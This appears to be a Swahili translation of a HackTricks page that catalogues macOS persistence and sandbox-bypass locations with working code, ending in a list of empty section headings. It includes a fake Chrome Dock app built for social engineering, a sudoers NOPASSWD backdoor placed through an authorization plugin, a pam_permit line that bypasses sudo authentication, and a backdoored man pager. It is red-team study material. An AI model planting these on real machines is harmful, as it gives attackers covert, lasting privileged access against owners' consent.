Baada ya script kukusanywa, weka Vitendo vya Folda kwa kutekeleza script iliyo hapa chini. Script hii itawawezesha Vitendo vya Folda kwa ujumla na kuunganisha kwa maalum script iliyokusanywa hapo awali kwenye folda ya Desktop.

// Enabling and attaching Folder Action
var se = Application("System Events");
se.folderActionsEnabled = true;
var myScript = se.Script({name: "source.js", posixPath: "/tmp/source.js"});
var fa = se.FolderAction({name: "Desktop", path: "/Users/username/Desktop"});
se.folderActions.push(fa);
fa.scripts.push(myScript);

Kimbia skripti ya usanidi na:

osascript -l JavaScript /Users/username/attach.scpt

Hii ndiyo njia ya kutekeleza uthabiti huu kupitia GUI:

Hii ndiyo script itakayotekelezwa:

source.js

var app = Application.currentApplication();
app.includeStandardAdditions = true;
app.doShellScript("touch /tmp/folderaction.txt");
app.doShellScript("touch ~/Desktop/folderaction.txt");
app.doShellScript("mkdir /tmp/asd123");
app.doShellScript("cp -R ~/Desktop /tmp/asd123");

Ihamashe kwa: osacompile -l JavaScript -o folder.scpt source.js

Hamisha kwenda:

mkdir -p "$HOME/Library/Scripts/Folder Action Scripts"
mv /tmp/folder.scpt "$HOME/Library/Scripts/Folder Action Scripts"

Kisha, fungua programu ya Folder Actions Setup, chagua folda unayotaka kufuatilia na uchague katika kesi yako folder.scpt (katika kesi yangu niliiita output2.scp):

Sasa, ukifungua folda hiyo na Finder, skripti yako itatekelezwa.

Usanidi huu ulihifadhiwa katika plist iliyoko ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist katika muundo wa base64.

Sasa, hebu jaribu kuandaa kudumu hii bila ufikiaji wa GUI:

Nakili ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist hadi /tmp ili kuifanya kuwa nakala ya akiba:

cp ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist /tmp

Ondoa Folder Actions ulizoweka hivi karibuni:

Sasa kwamba tuna mazingira tupu

Nakili faili ya akiba: cp /tmp/com.apple.FolderActionsDispatcher.plist ~/Library/Preferences/
Fungua Folder Actions Setup.app ili kutumia usanidi huu: open "/System/Library/CoreServices/Applications/Folder Actions Setup.app/"

Na hii haikufanya kazi kwangu, lakini hizo ndizo maelekezo kutoka kwa andiko:(

Dock shortcuts

Andiko: https://theevilbit.github.io/beyond/beyond_0027/

Inasaidia kupita sandbox: ✅
Lakini unahitaji kuwa na programu mbaya iliyosakinishwa ndani ya mfumo
TCC bypass: 🔴

Mahali

~/Library/Preferences/com.apple.dock.plist
Kichocheo: Wakati mtumiaji anabofya kwenye programu ndani ya dock

Maelezo & Ukatili

Programu zote zinazotokea katika Dock zimeainishwa ndani ya plist: ~/Library/Preferences/com.apple.dock.plist

Inawezekana kuongeza programu kwa kutumia tu:

# Add /System/Applications/Books.app
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/System/Applications/Books.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'

# Restart Dock
killall Dock

Kwa kutumia baadhi ya social engineering unaweza kujifanya kwa mfano Google Chrome ndani ya dock na kwa kweli kutekeleza script yako mwenyewe:

#!/bin/sh

# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)

rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null

# Create App structure
mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS
mkdir -p /tmp/Google\ Chrome.app/Contents/Resources

# Payload to execute
echo '#!/bin/sh
open /Applications/Google\ Chrome.app/ &
touch /tmp/ImGoogleChrome' > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome

chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome

# Info.plist
cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleExecutable</key>
<string>Google Chrome</string>
<key>CFBundleIdentifier</key>
<string>com.google.Chrome</string>
<key>CFBundleName</key>
<string>Google Chrome</string>
<key>CFBundleVersion</key>
<string>1.0</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleIconFile</key>
<string>app</string>
</dict>
</plist>
EOF

# Copy icon from Google Chrome
cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns

# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
killall Dock

Color Pickers

Writeup: https://theevilbit.github.io/beyond/beyond_0017

Inatumika kupita sandbox: 🟠
Hatua maalum sana inahitaji kutokea
Utamalizika katika sandbox nyingine
TCC bypass: 🔴

Location

/Library/ColorPickers
Msingi unahitajika
Trigger: Tumia mchoro wa rangi
~/Library/ColorPickers
Trigger: Tumia mchoro wa rangi

Description & Exploit

Tengeneza bundle ya mchoro wa rangi na msimbo wako (unaweza kutumia hii kwa mfano) na ongeza muundaji (kama katika sehemu ya Screen Saver) na nakili bundle hiyo kwenye ~/Library/ColorPickers.

Kisha, wakati mchoro wa rangi unapoanzishwa, sauti yako inapaswa pia kuwa.

Kumbuka kwamba binary inayopakia maktaba yako ina sandbox yenye vizuizi vikali sana: /System/Library/Frameworks/AppKit.framework/Versions/C/XPCServices/LegacyExternalColorPickerService-x86_64.xpc/Contents/MacOS/LegacyExternalColorPickerService-x86_64

[Key] com.apple.security.temporary-exception.sbpl
[Value]
[Array]
[String] (deny file-write* (home-subpath "/Library/Colors"))
[String] (allow file-read* process-exec file-map-executable (home-subpath "/Library/ColorPickers"))
[String] (allow file-read* (extension "com.apple.app-sandbox.read"))

Finder Sync Plugins

Andiko: https://theevilbit.github.io/beyond/beyond_0026/ Andiko: https://objective-see.org/blog/blog_0x11.html

Inatumika kupita sandbox: Hapana, kwa sababu unahitaji kutekeleza programu yako mwenyewe
TCC bypass: ???

Mahali

Programu maalum

Maelezo & Ulaghai

Mfano wa programu yenye Finder Sync Extension inaweza kupatikana hapa.

Programu zinaweza kuwa na Finder Sync Extensions. Kupanua hii kutakwenda ndani ya programu ambayo itatekelezwa. Zaidi ya hayo, ili kupanua iweze kutekeleza msimbo wake lazima isainiwe na cheti halali cha mende wa Apple, lazima iwe sandboxed (ingawa visamehe vya kulegeza vinaweza kuongezwa) na lazima iandikishwe na kitu kama:

pluginkit -a /Applications/FindIt.app/Contents/PlugIns/FindItSync.appex
pluginkit -e use -i com.example.InSync.InSync

Screen Saver

Writeup: https://theevilbit.github.io/beyond/beyond_0016/ Writeup: https://posts.specterops.io/saving-your-access-d562bf5bf90b

Inatumika kupita sandbox: 🟠
Lakini utaishia kwenye sandbox ya programu ya kawaida
TCC bypass: 🔴

Location

/System/Library/Screen Savers
Root required
Trigger: Chagua screen saver
/Library/Screen Savers
Root required
Trigger: Chagua screen saver
~/Library/Screen Savers
Trigger: Chagua screen saver

Description & Exploit

Unda mradi mpya katika Xcode na uchague kiolezo ili kuunda Screen Saver mpya. Kisha, ongeza msimbo wako kwake, kwa mfano msimbo ufuatao ili kuunda logs.

Build hiyo, na nakili bundle ya .saver kwenye ~/Library/Screen Savers. Kisha, fungua GUI ya Screen Saver na ukibonyeza tu, inapaswa kuunda logs nyingi:

sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "hello_screensaver"'

Timestamp                       (process)[PID]
2023-09-27 22:55:39.622369+0200  localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver void custom(int, const char **)
2023-09-27 22:55:39.622623+0200  localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView initWithFrame:isPreview:]
2023-09-27 22:55:39.622704+0200  localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView hasConfigureSheet]

Kumbuka kwamba kwa sababu ndani ya ruhusa za binary inayopakia msimbo huu (/System/Library/Frameworks/ScreenSaver.framework/PlugIns/legacyScreenSaver.appex/Contents/MacOS/legacyScreenSaver) unaweza kupata com.apple.security.app-sandbox utakuwa ndani ya sandbox ya programu ya kawaida.

Saver code:

//
//  ScreenSaverExampleView.m
//  ScreenSaverExample
//
//  Created by Carlos Polop on 27/9/23.
//

#import "ScreenSaverExampleView.h"

@implementation ScreenSaverExampleView

- (instancetype)initWithFrame:(NSRect)frame isPreview:(BOOL)isPreview
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
self = [super initWithFrame:frame isPreview:isPreview];
if (self) {
[self setAnimationTimeInterval:1/30.0];
}
return self;
}

- (void)startAnimation
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
[super startAnimation];
}

- (void)stopAnimation
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
[super stopAnimation];
}

- (void)drawRect:(NSRect)rect
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
[super drawRect:rect];
}

- (void)animateOneFrame
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
return;
}

- (BOOL)hasConfigureSheet
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
return NO;
}

- (NSWindow*)configureSheet
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
return nil;
}

__attribute__((constructor))
void custom(int argc, const char **argv) {
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
}

@end

Spotlight Plugins

writeup: https://theevilbit.github.io/beyond/beyond_0011/

Inatumika kupita sandbox: 🟠
Lakini utaishia kwenye sandbox ya programu
TCC bypass: 🔴
Sandbox inaonekana kuwa na mipaka sana

Location

~/Library/Spotlight/
Trigger: Faili mpya yenye kiambatisho kinachosimamiwa na plugin ya spotlight inaundwa.
/Library/Spotlight/
Trigger: Faili mpya yenye kiambatisho kinachosimamiwa na plugin ya spotlight inaundwa.
Inahitaji root
/System/Library/Spotlight/
Trigger: Faili mpya yenye kiambatisho kinachosimamiwa na plugin ya spotlight inaundwa.
Inahitaji root
Some.app/Contents/Library/Spotlight/
Trigger: Faili mpya yenye kiambatisho kinachosimamiwa na plugin ya spotlight inaundwa.
Inahitaji programu mpya

Description & Exploitation

Spotlight ni kipengele cha utafutaji kilichojengwa ndani ya macOS, kilichoundwa kutoa watumiaji ufikiaji wa haraka na wa kina kwa data kwenye kompyuta zao. Ili kuwezesha uwezo huu wa utafutaji wa haraka, Spotlight inashikilia hifadhidata ya miliki na kuunda orodha kwa kuchambua faili nyingi, ikiruhusu utafutaji wa haraka kupitia majina ya faili na maudhui yao.

Mekaniki ya msingi ya Spotlight inahusisha mchakato wa kati unaoitwa 'mds', ambayo inasimama kwa 'metadata server'. Mchakato huu unaratibu huduma nzima ya Spotlight. Kuongeza hii, kuna daemon nyingi za 'mdworker' zinazofanya kazi mbalimbali za matengenezo, kama vile kuorodhesha aina tofauti za faili (ps -ef | grep mdworker). Kazi hizi zinawezekana kupitia plugins za kuagiza Spotlight, au ".mdimporter bundles", ambazo zinamwezesha Spotlight kuelewa na kuorodhesha maudhui katika aina mbalimbali za muundo wa faili.

Plugins au .mdimporter bundles ziko katika maeneo yaliyotajwa hapo awali na ikiwa bundle mpya itaonekana inachukuliwa ndani ya dakika (hakuna haja ya kuanzisha huduma yoyote upya). Bundles hizi zinahitaji kuonyesha ni aina gani ya faili na viambatisho vinaweza kusimamiwa, kwa njia hii, Spotlight itazitumia wakati faili mpya yenye kiambatisho kilichotajwa inaundwa.

Inawezekana kupata mdimporters zote zilizopakiwa zinazoendesha:

mdimport -L
Paths: id(501) (
"/System/Library/Spotlight/iWork.mdimporter",
"/System/Library/Spotlight/iPhoto.mdimporter",
"/System/Library/Spotlight/PDF.mdimporter",
[...]

Na kwa mfano /Library/Spotlight/iBooksAuthor.mdimporter inatumika kuchambua aina hizi za faili (nyongeza .iba na .book miongoni mwa zingine):

plutil -p /Library/Spotlight/iBooksAuthor.mdimporter/Contents/Info.plist

[...]
"CFBundleDocumentTypes" => [
0 => {
"CFBundleTypeName" => "iBooks Author Book"
"CFBundleTypeRole" => "MDImporter"
"LSItemContentTypes" => [
0 => "com.apple.ibooksauthor.book"
1 => "com.apple.ibooksauthor.pkgbook"
2 => "com.apple.ibooksauthor.template"
3 => "com.apple.ibooksauthor.pkgtemplate"
]
"LSTypeIsPackage" => 0
}
]
[...]
=> {
"UTTypeConformsTo" => [
0 => "public.data"
1 => "public.composite-content"
]
"UTTypeDescription" => "iBooks Author Book"
"UTTypeIdentifier" => "com.apple.ibooksauthor.book"
"UTTypeReferenceURL" => "http://www.apple.com/ibooksauthor"
"UTTypeTagSpecification" => {
"public.filename-extension" => [
0 => "iba"
1 => "book"
]
}
}
[...]

Ikiwa utaangalia Plist ya mdimporter nyingine huenda usipate kipengee UTTypeConformsTo. Hii ni kwa sababu hiyo ni Identifiers za Aina za Msingi (UTI) na haitaji kufafanua nyongeza.

Zaidi ya hayo, plugins za mfumo wa kawaida daima zina kipaumbele, hivyo mshambuliaji anaweza kufikia tu faili ambazo hazijapangwa na mdimporters za Apple.

Ili kuunda importer yako mwenyewe unaweza kuanzia na mradi huu: https://github.com/megrimm/pd-spotlight-importer kisha badilisha jina, CFBundleDocumentTypes na ongeza UTImportedTypeDeclarations ili iweze kusaidia nyongeza unayotaka kusaidia na kuakisi hizo katika schema.xml. Kisha badilisha msimbo wa kazi GetMetadataForFile ili kutekeleza payload yako wakati faili yenye nyongeza iliyoshughulikiwa inaundwa.

Hatimaye jenga na nakili .mdimporter yako mpya kwenye moja ya maeneo yaliyotajwa hapo awali na unaweza kuangalia ikiwa imepakuliwa ukifuatilia kumbukumbu au kuangalia mdimport -L.

Pane ya Mipangilio

Haionekani kama hii inafanya kazi tena.

Andiko: https://theevilbit.github.io/beyond/beyond_0009/

Inafaida kupita sandbox: 🟠
Inahitaji hatua maalum ya mtumiaji
Kupita TCC: 🔴

Mahali

/System/Library/PreferencePanes
/Library/PreferencePanes
~/Library/PreferencePanes

Maelezo

Haionekani kama hii inafanya kazi tena.

Kupita Sandbox ya Root

Hapa unaweza kupata maeneo ya kuanzia yanayofaa kwa kupita sandbox ambayo inakuwezesha kutekeleza kitu kwa urahisi kwa kukiandika kwenye faili ukiwa root na/au kuhitaji hali za ajabu.

Kila Wakati

Andiko: https://theevilbit.github.io/beyond/beyond_0019/

Inafaida kupita sandbox: 🟠
Lakini unahitaji kuwa root
Kupita TCC: 🔴

Mahali

/etc/periodic/daily, /etc/periodic/weekly, /etc/periodic/monthly, /usr/local/etc/periodic
Inahitaji Root
Kichocheo: Wakati wa wakati
/etc/daily.local, /etc/weekly.local au /etc/monthly.local
Inahitaji Root
Kichocheo: Wakati wa wakati

Maelezo & Ukatili

Mifumo ya kila wakati (/etc/periodic) inatekelezwa kwa sababu ya daemons za uzinduzi zilizowekwa katika /System/Library/LaunchDaemons/com.apple.periodic*. Kumbuka kwamba scripts zilizohifadhiwa katika /etc/periodic/ zina tekelezwa kama mmiliki wa faili, hivyo hii haitafanya kazi kwa ajili ya kupanda kwa haki.

# Launch daemons that will execute the periodic scripts
ls -l /System/Library/LaunchDaemons/com.apple.periodic*
-rw-r--r--  1 root  wheel  887 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-daily.plist
-rw-r--r--  1 root  wheel  895 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-monthly.plist
-rw-r--r--  1 root  wheel  891 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-weekly.plist

# The scripts located in their locations
ls -lR /etc/periodic
total 0
drwxr-xr-x  11 root  wheel  352 May 13 00:29 daily
drwxr-xr-x   5 root  wheel  160 May 13 00:29 monthly
drwxr-xr-x   3 root  wheel   96 May 13 00:29 weekly

/etc/periodic/daily:
total 72
-rwxr-xr-x  1 root  wheel  1642 May 13 00:29 110.clean-tmps
-rwxr-xr-x  1 root  wheel   695 May 13 00:29 130.clean-msgs
[...]

/etc/periodic/monthly:
total 24
-rwxr-xr-x  1 root  wheel   888 May 13 00:29 199.rotate-fax
-rwxr-xr-x  1 root  wheel  1010 May 13 00:29 200.accounting
-rwxr-xr-x  1 root  wheel   606 May 13 00:29 999.local

/etc/periodic/weekly:
total 8
-rwxr-xr-x  1 root  wheel  620 May 13 00:29 999.local

Kuna skripti nyingine za kipindi ambazo zitatekelezwa zinazoonyeshwa katika /etc/defaults/periodic.conf:

grep "Local scripts" /etc/defaults/periodic.conf
daily_local="/etc/daily.local"				# Local scripts
weekly_local="/etc/weekly.local"			# Local scripts
monthly_local="/etc/monthly.local"			# Local scripts

Ikiwa utaweza kuandika yoyote ya faili /etc/daily.local, /etc/weekly.local au /etc/monthly.local itatekelezwa mapema au baadaye.

Kumbuka kwamba skripti ya kila wakati itatekelezwa kama mmiliki wa skripti. Hivyo kama mtumiaji wa kawaida ndiye mmiliki wa skripti, itatekelezwa kama mtumiaji huyo (hii inaweza kuzuia mashambulizi ya kupandisha mamlaka).

PAM

Writeup: Linux Hacktricks PAM Writeup: https://theevilbit.github.io/beyond/beyond_0005/

Inasaidia kupita sandbox: 🟠
Lakini unahitaji kuwa root
TCC bypass: 🔴

Mahali

Root daima inahitajika

Maelezo & Utekelezaji

Kama PAM inazingatia zaidi kuendelea na malware kuliko utekelezaji rahisi ndani ya macOS, blogu hii haitatoa maelezo ya kina, soma writeups ili kuelewa mbinu hii vizuri zaidi.

Angalia moduli za PAM kwa:

ls -l /etc/pam.d

Tekniki ya kudumu/kuinua mamlaka inayotumia PAM ni rahisi kama kubadilisha moduli /etc/pam.d/sudo kwa kuongeza mstari huu mwanzoni:

auth       sufficient     pam_permit.so

Hivyo itakuwa inafanana na kitu kama hiki:

# sudo: auth account password session
auth       sufficient     pam_permit.so
auth       include        sudo_local
auth       sufficient     pam_smartcard.so
auth       required       pam_opendirectory.so
account    required       pam_permit.so
password   required       pam_deny.so
session    required       pam_permit.so

Na kwa hivyo, jaribio lolote la kutumia sudo litafanya kazi.

Kumbuka kwamba hii directory inalindwa na TCC hivyo kuna uwezekano mkubwa kwamba mtumiaji atapata ujumbe wa kuomba ruhusa.

Mfano mwingine mzuri ni su, ambapo unaweza kuona kwamba pia inawezekana kutoa vigezo kwa moduli za PAM (na unaweza pia kuweka backdoor kwenye faili hii):

cat /etc/pam.d/su
# su: auth account session
auth       sufficient     pam_rootok.so
auth       required       pam_opendirectory.so
account    required       pam_group.so no_warn group=admin,wheel ruser root_only fail_safe
account    required       pam_opendirectory.so no_check_shell
password   required       pam_opendirectory.so
session    required       pam_launchd.so

Authorization Plugins

Writeup: https://theevilbit.github.io/beyond/beyond_0028/ Writeup: https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65

Inatumika kupita sandbox: 🟠
Lakini unahitaji kuwa root na kufanya mipangilio ya ziada
TCC bypass: ???

Location

/Library/Security/SecurityAgentPlugins/
Root inahitajika
Pia inahitajika kuunda hifadhidata ya idhini ili kutumia plugin

Description & Exploitation

Unaweza kuunda plugin ya idhini ambayo itatekelezwa wakati mtumiaji anapoingia ili kudumisha kudumu. Kwa maelezo zaidi kuhusu jinsi ya kuunda moja ya hizi plugins angalia maandiko ya awali (na kuwa makini, moja iliyoandikwa vibaya inaweza kukufunga na utahitaji kusafisha mac yako kutoka kwa hali ya urejelezi).

// Compile the code and create a real bundle
// gcc -bundle -framework Foundation main.m -o CustomAuth
// mkdir -p CustomAuth.bundle/Contents/MacOS
// mv CustomAuth CustomAuth.bundle/Contents/MacOS/

#import <Foundation/Foundation.h>

__attribute__((constructor)) static void run()
{
NSLog(@"%@", @"[+] Custom Authorization Plugin was loaded");
system("echo \"%staff ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers");
}

Hamisha kifurushi kwenye eneo litakalopakiwa:

cp -r CustomAuth.bundle /Library/Security/SecurityAgentPlugins/

Hatimaye ongeza kanuni ya kupakia Plugin hii:

cat > /tmp/rule.plist <<EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>class</key>
<string>evaluate-mechanisms</string>
<key>mechanisms</key>
<array>
<string>CustomAuth:login,privileged</string>
</array>
</dict>
</plist>
EOF

security authorizationdb write com.asdf.asdf < /tmp/rule.plist

The evaluate-mechanisms itasema kwa mfumo waidhinishaji kwamba itahitaji kuita mekanizma ya nje kwa ajili ya idhini. Zaidi ya hayo, privileged itafanya itekelezwe na root.

Ianzishe kwa:

security authorize com.asdf.asdf

Na kisha kikundi cha wafanyakazi kinapaswa kuwa na sudo ufikiaji (soma /etc/sudoers ili kuthibitisha).

Man.conf

Writeup: https://theevilbit.github.io/beyond/beyond_0030/

Inasaidia kupita sandbox: 🟠
Lakini unahitaji kuwa root na mtumiaji lazima atumie man
TCC bypass: 🔴

Mahali

/private/etc/man.conf
Root inahitajika
/private/etc/man.conf: Wakati wowote man inapotumika

Maelezo & Ulaghai

Faili ya config /private/etc/man.conf inaonyesha binary/script ya kutumia wakati wa kufungua faili za hati za man. Hivyo, njia ya executable inaweza kubadilishwa ili kila wakati mtumiaji anapotumia man kusoma hati, backdoor inatekelezwa.

Kwa mfano weka katika /private/etc/man.conf:

MANPAGER /tmp/view

Na kisha unda /tmp/view kama:

#!/bin/zsh

touch /tmp/manconf

/usr/bin/less -s

Apache2

Writeup: https://theevilbit.github.io/beyond/beyond_0023/

Inatumika kupita sandbox: 🟠
Lakini unahitaji kuwa root na apache inahitaji kuwa inafanya kazi
TCC bypass: 🔴
Httpd haina entitlements

Location

/etc/apache2/httpd.conf
Root inahitajika
Trigger: Wakati Apache2 inaanza

Description & Exploit

Unaweza kuashiria katika /etc/apache2/httpd.conf ili kupakia moduli kwa kuongeza mstari kama:

LoadModule my_custom_module /Users/Shared/example.dylib "My Signature Authority"

Kwa njia hii, moduli zako zilizokusanywa zitawekwa na Apache. Jambo pekee ni kwamba unahitaji kuisaini na cheti halali cha Apple, au unahitaji kuongeza cheti kipya kinachotambulika katika mfumo na kuiandika kwa kutumia hicho.

Kisha, ikiwa inahitajika, kuhakikisha kwamba seva itaanza unaweza kutekeleza:

sudo launchctl load -w /System/Library/LaunchDaemons/org.apache.httpd.plist

Mfano wa msimbo kwa ajili ya Dylb:

#include <stdio.h>
#include <syslog.h>

__attribute__((constructor))
static void myconstructor(int argc, const char **argv)
{
printf("[+] dylib constructor called from %s\n", argv[0]);
syslog(LOG_ERR, "[+] dylib constructor called from %s\n", argv[0]);
}

BSM audit framework

Writeup: https://theevilbit.github.io/beyond/beyond_0031/

Inatumika kupita sandbox: 🟠
Lakini unahitaji kuwa root, auditd iwe inafanya kazi na kusababisha onyo
TCC bypass: 🔴

Location

/etc/security/audit_warn
Root inahitajika
Trigger: Wakati auditd inagundua onyo

Description & Exploit

Wakati wowote auditd inagundua onyo, script /etc/security/audit_warn inatekelezwa. Hivyo unaweza kuongeza payload yako juu yake.

echo "touch /tmp/auditd_warn" >> /etc/security/audit_warn

You could force a warning with sudo audit -n.

Startup Items

Hii imepitwa na wakati, hivyo hakuna kitu kinapaswa kupatikana katika hizo directories.

The StartupItem is a directory that should be positioned within either /Library/StartupItems/ or /System/Library/StartupItems/. Once this directory is established, it must encompass two specific files:

An rc script: A shell script executed at startup.
A plist file, specifically named StartupParameters.plist, which contains various configuration settings.

Ensure that both the rc script and the StartupParameters.plist file are correctly placed inside the StartupItem directory for the startup process to recognize and utilize them.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Description</key>
<string>This is a description of this service</string>
<key>OrderPreference</key>
<string>None</string> <!--Other req services to execute before this -->
<key>Provides</key>
<array>
<string>superservicename</string> <!--Name of the services provided by this file -->
</array>
</dict>
</plist>

#!/bin/sh
. /etc/rc.common

StartService(){
touch /tmp/superservicestarted
}

StopService(){
rm /tmp/superservicestarted
}

RestartService(){
echo "Restarting"
}

RunService "$1"

emond

Siwezi kupata sehemu hii katika macOS yangu hivyo kwa maelezo zaidi angalia andiko

Andiko: https://theevilbit.github.io/beyond/beyond_0023/

Iliyoanzishwa na Apple, emond ni mekanizma ya kurekodi ambayo inaonekana kuwa haijakamilika au labda imeachwa, lakini bado inapatikana. Ingawa si ya manufaa sana kwa msimamizi wa Mac, huduma hii isiyo na umaarufu inaweza kutumika kama njia ya kudumu kwa wahalifu wa mtandao, ambayo huenda ikakosa kuonekana na wasimamizi wengi wa macOS.

Kwa wale wanaojua kuhusu uwepo wake, kubaini matumizi yoyote mabaya ya emond ni rahisi. LaunchDaemon ya mfumo kwa huduma hii inatafuta scripts za kutekeleza katika saraka moja. Ili kuchunguza hili, amri ifuatayo inaweza kutumika:

ls -l /private/var/db/emondClients

XQuartz

Writeup: https://theevilbit.github.io/beyond/beyond_0018/

Location

/opt/X11/etc/X11/xinit/privileged_startx.d
Inahitajika root
Trigger: Pamoja na XQuartz

Description & Exploit

XQuartz haitumiki tena katika macOS, hivyo ikiwa unataka maelezo zaidi angalia andiko.

kext

Ni ngumu sana kufunga kext hata kama ni root hivyo sitazingatia hii kutoroka kutoka kwenye sandboxes au hata kwa kudumu (isipokuwa una exploit)

Location

Ili kufunga KEXT kama kipengele cha kuanzisha, inahitaji kufungwa katika moja ya maeneo yafuatayo:

/System/Library/Extensions
Faili za KEXT zilizojengwa ndani ya mfumo wa uendeshaji wa OS X.
/Library/Extensions
Faili za KEXT zilizofungwa na programu za upande wa tatu

Unaweza kuorodhesha faili za kext zilizopakiwa kwa sasa kwa:

kextstat #List loaded kext
kextload /path/to/kext.kext #Load a new one based on path
kextload -b com.apple.driver.ExampleBundle #Load a new one based on path
kextunload /path/to/kext.kext
kextunload -b com.apple.driver.ExampleBundle

Kwa maelezo zaidi kuhusu nyongeza za kernel angalia sehemu hii.

amstoold

Andiko: https://theevilbit.github.io/beyond/beyond_0029/

Mahali

/usr/local/bin/amstoold
Inahitajika Root

Maelezo & Ukatili

Kwa wazi plist kutoka /System/Library/LaunchAgents/com.apple.amstoold.plist ilikuwa ikitumia hii binary wakati ikifichua huduma ya XPC... jambo ni kwamba binary hiyo haikuexist, hivyo unaweza kuweka kitu hapo na wakati huduma ya XPC itakapoitwa binary yako itaitwa.

Siwezi tena kuipata hii katika macOS yangu.

xsanctl

Andiko: https://theevilbit.github.io/beyond/beyond_0015/

Mahali

/Library/Preferences/Xsan/.xsanrc
Inahitajika Root
Kichocheo: Wakati huduma inapoendeshwa (nadra)

Maelezo & ukatili

Kwa wazi si kawaida sana kuendesha skripti hii na sikuweza hata kuipata katika macOS yangu, hivyo ikiwa unataka maelezo zaidi angalia andiko.

/etc/rc.common

Hii haifanyi kazi katika toleo za kisasa za MacOS

Pia inawezekana kuweka hapa amri ambazo zitatekelezwa wakati wa kuanzisha. Mfano wa skripti ya kawaida ya rc.common:

#
# Common setup for startup scripts.
#
# Copyright 1998-2002 Apple Computer, Inc.
#

######################
# Configure the shell #
######################

#
# Be strict
#
#set -e
set -u

#
# Set command search path
#
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/libexec:/System/Library/CoreServices; export PATH

#
# Set the terminal mode
#
#if [ -x /usr/bin/tset ] && [ -f /usr/share/misc/termcap ]; then
#    TERM=$(tset - -Q); export TERM
#fi

###################
# Useful functions #
###################

#
# Determine if the network is up by looking for any non-loopback
# internet network interfaces.
#
CheckForNetwork()
{
local test

if [ -z "${NETWORKUP:=}" ]; then
test=$(ifconfig -a inet 2>/dev/null | sed -n -e '/127.0.0.1/d' -e '/0.0.0.0/d' -e '/inet/p' | wc -l)
if [ "${test}" -gt 0 ]; then
NETWORKUP="-YES-"
else
NETWORKUP="-NO-"
fi
fi
}

alias ConsoleMessage=echo

#
# Process management
#
GetPID ()
{
local program="$1"
local pidfile="${PIDFILE:=/var/run/${program}.pid}"
local     pid=""

if [ -f "${pidfile}" ]; then
pid=$(head -1 "${pidfile}")
if ! kill -0 "${pid}" 2> /dev/null; then
echo "Bad pid file $pidfile; deleting."
pid=""
rm -f "${pidfile}"
fi
fi

if [ -n "${pid}" ]; then
echo "${pid}"
return 0
else
return 1
fi
}

#
# Generic action handler
#
RunService ()
{
case $1 in
start  ) StartService   ;;
stop   ) StopService    ;;
restart) RestartService ;;
*      ) echo "$0: unknown argument: $1";;
esac
}

Mbinu na zana za kudumu

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Sandbox Bypass

Launchd

Locations

Description & Exploitation

Maelezo zaidi kuhusu launchd

faili za kuanzisha shell

Mahali

Maelezo & Ukatili

Re-opened Applications

Location

Description & Exploitation

Terminal Preferences

Location

Description & Exploitation

Terminal Scripts / Other file extensions

Location

Description & Exploitation

Audio Plugins

Location

Description

QuickLook Plugins

Location

Description & Exploitation

Login/Logout Hooks

Location

Conditional Sandbox Bypass

Cron

Location

Description & Exploitation

iTerm2

Locations

Description & Exploitation

xbar

Mahali

Maelezo

Hammerspoon

Location

Description

